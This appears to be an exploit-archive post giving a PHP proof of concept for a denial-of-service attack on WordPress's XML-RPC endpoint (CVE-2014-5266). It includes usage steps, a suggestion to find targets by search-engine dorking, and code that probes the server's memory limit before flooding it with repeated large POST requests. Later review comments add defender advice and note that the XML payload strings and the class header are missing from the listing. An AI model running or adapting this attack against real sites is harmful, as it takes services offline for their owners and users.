=============================================================================================================================================
| # Title : WordPress XMLRPC v3.9.2 Denial of Service vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.WordPress.org/ |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: This code performs a Denial of Service (DoS) attack against WordPress' XMLRPC interface, which had a vulnerability that was consuming server resources when sending large requests. (Related : https://packetstorm.news/files/id/180506/ Linked CVE numbers: CVE-2014-5266 ),

[+] save code as poc.php.

[+] Set taget : Line 84.

[+] USage : php poc.php

[+] PayLoad :

// NOTE(review): the listing is truncated at this point. The opening PHP tag,
// the class declaration and the constructor signature are missing (presumably
// lost when the page was extracted); only the tail of the constructor body
// survives. The class name WordpressXMLRPCDoS is known only from the
// instantiation at the bottom of the listing.
//
// Defender note: the description above links this to CVE-2014-5266. Keep
// WordPress core on a release that carries the XML-RPC fix, block or
// rate-limit /xmlrpc.php where the endpoint is not needed, and cap request
// body size at the web server or WAF.
// NOTE(review): the title names v3.9.2 - confirm the affected version range
// against the vendor advisory for the linked CVE.

// Tail of the constructor: stores the target base URL, the number of requests
// to send, the fallback size and the probing step on the object.
target = $target;
        $this->requestLimit = $requestLimit;
        $this->defaultLimit = $defaultLimit;
        $this->fingerprintStep = $fingerprintStep;
    }

    // POSTs $xml to <target>/xmlrpc.php with Content-Type text/xml and a
    // 3-second timeout, and returns only the HTTP status code.
    // The response body is read into $response but never used.
    // Defender note: in access logs this appears as repeated POST requests to
    // /xmlrpc.php; large bodies answered with HTTP 500 are the pattern to
    // alert on.
    private function sendRequest($xml) {
        $ch = curl_init($this->target . '/xmlrpc.php');
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $xml);
        curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: text/xml']);
        curl_setopt($ch, CURLOPT_TIMEOUT, 3);
        $response = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        return $httpCode;
    }

    // Probes with documents generated for increasing sizes, starting at
    // fingerprintStep and growing by fingerprintStep while the size is below
    // 1024. The first HTTP 500 is taken as the point where the server's limit
    // was exceeded and the previous size is returned; if no 500 is seen,
    // defaultLimit is returned.
    // Any 500 response is counted, whatever its actual cause.
    private function fingerprint() {
        $memoryToUse = $this->fingerprintStep;
        while ($memoryToUse < 1024) {
            echo "Trying memory limit {$memoryToUse}MB\n";
            $xml = $this->generateXML($memoryToUse);
            $responseCode = $this->sendRequest($xml);
            if ($responseCode == 500) {
                // Step back to the last size that did not produce an error.
                $lastLimit = $memoryToUse - $this->fingerprintStep;
                echo "Got an error - using limit {$lastLimit}MB\n";
                return $lastLimit;
            }
            $memoryToUse += $this->fingerprintStep;
        }
        echo "Cannot determine limit, using default of {$this->defaultLimit}MB\n";
        return $this->defaultLimit;
    }

    // Builds the request document for the given size and returns it as a string.
    // $entity, $param1 and $param2 are random hex names that end up in the
    // template. $doctype and $sizeBytes are computed but not referenced
    // anywhere in the template as it is shown here.
    // NOTE(review): the string literals below are empty or near-empty; the XML
    // markup appears to have been stripped when the page was extracted, so this
    // listing does not show the document that was actually sent.
    // NOTE(review): the messages elsewhere label the size as MB while this
    // method multiplies by 1024 once - the intended unit cannot be confirmed
    // from here.
    private function generateXML($size) {
        $entity = bin2hex(random_bytes(2));
        $doctype = bin2hex(random_bytes(3));
        $param1 = bin2hex(random_bytes(3));
        $param2 = bin2hex(random_bytes(3));
        $sizeBytes = $size * 1024;
        $xmlTemplate = "" . "]" . "" . "&{$entity};" . "" . "{$param1}" . "{$param2}" . "";
        return $xmlTemplate;
    }

    // Entry point: runs the fingerprint step, builds one document for the
    // resulting size, then sends that same document requestLimit times, one
    // request after another.
    public function run() {
        echo "Fingerprinting memory limit...\n";
        $size = $this->fingerprint();
        echo "Using {$size}MB as memory limit\n";
        $xml = $this->generateXML($size);
        for ($i = 1; $i <= $this->requestLimit; $i++) {
            echo "Sending request #{$i}...\n";
            $this->sendRequest($xml);
        }
    }
}

// Only $target is passed to the constructor; the remaining settings presumably
// have defaults in the signature that is missing from this listing.
$target = "http://example.com"; // put the target URL here
$attack = new WordpressXMLRPCDoS($target);
$attack->run();

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================